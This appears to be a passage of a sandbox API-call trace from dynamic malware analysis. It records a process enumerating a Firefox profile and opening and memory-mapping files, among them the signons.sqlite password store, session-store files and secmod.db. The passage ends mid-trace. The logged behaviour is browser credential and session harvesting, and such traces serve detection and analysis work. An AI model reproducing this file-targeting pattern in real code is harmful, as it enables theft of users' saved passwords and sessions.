[0590.793] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.793] lstrlenW (lpString="\\") returned 1 [0590.793] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.793] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.793] lstrlenW (lpString="pluginreg.dat") returned 13 [0590.793] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.793] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.793] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.793] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.793] CloseHandle (hObject=0x5ac) returned 1 [0590.793] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.793] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5dbdf0 [0590.794] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x5dbdf0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0590.794] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.794] CloseHandle (hObject=0x5ac) returned 1 [0590.794] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.794] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0590.794] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.794] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.794] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.794] LocalFree (hMem=0x56cab0) returned 0x0 [0590.794] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.794] lstrlenW (lpString="\\") returned 1 [0590.794] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.794] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.794] lstrlenW (lpString="prefs.js") returned 8 [0590.794] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.794] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.794] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.794] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.794] CloseHandle (hObject=0x5ac) returned 1 [0590.794] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.794] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.794] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0590.794] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.794] CloseHandle (hObject=0x5ac) returned 1 [0590.795] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.795] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0590.795] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.795] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.795] LocalFree (hMem=0x63bd28) returned 0x0 [0590.795] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.795] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.795] lstrlenW (lpString="\\") returned 1 [0590.795] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.795] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.795] lstrlenW (lpString="search.json") returned 11 [0590.795] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.795] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.795] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.795] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.795] CloseHandle (hObject=0x5ac) returned 1 [0590.795] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.795] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.795] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0590.796] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.796] CloseHandle (hObject=0x5ac) returned 1 [0590.796] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.796] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0590.796] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.796] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.796] LocalFree (hMem=0x63bd28) returned 0x0 [0590.796] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.796] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.796] lstrlenW (lpString="\\") returned 1 [0590.796] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.796] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.796] lstrlenW (lpString="secmod.db") returned 9 [0590.796] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.796] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.796] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.796] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.796] CloseHandle (hObject=0x5ac) returned 1 [0590.796] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0590.796] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bd28 [0590.796] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x63bd28, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0590.796] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.797] CloseHandle (hObject=0x5ac) returned 1 [0590.797] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.797] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.797] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.797] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.797] LocalFree (hMem=0x63bd28) returned 0x0 [0590.797] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.797] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.797] lstrlenW (lpString="\\") returned 1 [0590.797] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.797] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.797] lstrlenW (lpString="sessionstore.bak") returned 16 [0590.797] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.797] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.797] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.797] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.797] CloseHandle (hObject=0x5ac) returned 1 [0590.797] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.797] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.797] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x5dbdf0, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0590.797] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.797] CloseHandle (hObject=0x5ac) returned 1 [0590.798] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.798] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0590.798] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.798] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.798] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.798] LocalFree (hMem=0x56cab0) returned 0x0 [0590.798] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.798] lstrlenW (lpString="\\") returned 1 [0590.798] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.798] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.798] lstrlenW (lpString="sessionstore.js") returned 15 [0590.798] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.798] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.798] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.798] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.798] CloseHandle (hObject=0x5ac) returned 1 [0590.798] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0590.798] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x5dbdf0 [0590.798] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x5dbdf0, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0590.798] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.798] CloseHandle (hObject=0x5ac) returned 1 [0590.798] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.798] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0590.798] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.799] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.799] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.799] LocalFree (hMem=0x56cab0) returned 0x0 [0590.799] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.799] lstrlenW (lpString="\\") returned 1 [0590.799] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.799] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.799] lstrlenW (lpString="signons.sqlite") returned 14 [0590.799] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.799] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.799] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.799] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.799] CloseHandle (hObject=0x5ac) returned 1 [0590.799] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.799] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.799] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0590.799] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.799] CloseHandle (hObject=0x5ac) returned 1 [0590.799] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.799] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0590.799] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.799] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0590.802] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.802] LocalFree (hMem=0x56cab0) returned 0x0 [0590.802] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.802] lstrlenW (lpString="\\") returned 1 [0590.802] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.802] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.802] lstrlenW (lpString="times.json") returned 10 [0590.802] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.802] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bbf0 [0590.802] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.802] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.802] CloseHandle (hObject=0x5ac) returned 1 [0590.803] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0590.803] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.803] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x63bd28, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0590.803] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.803] CloseHandle (hObject=0x5ac) returned 1 [0590.803] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.803] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0590.803] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.803] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.803] LocalFree (hMem=0x63bd28) returned 0x0 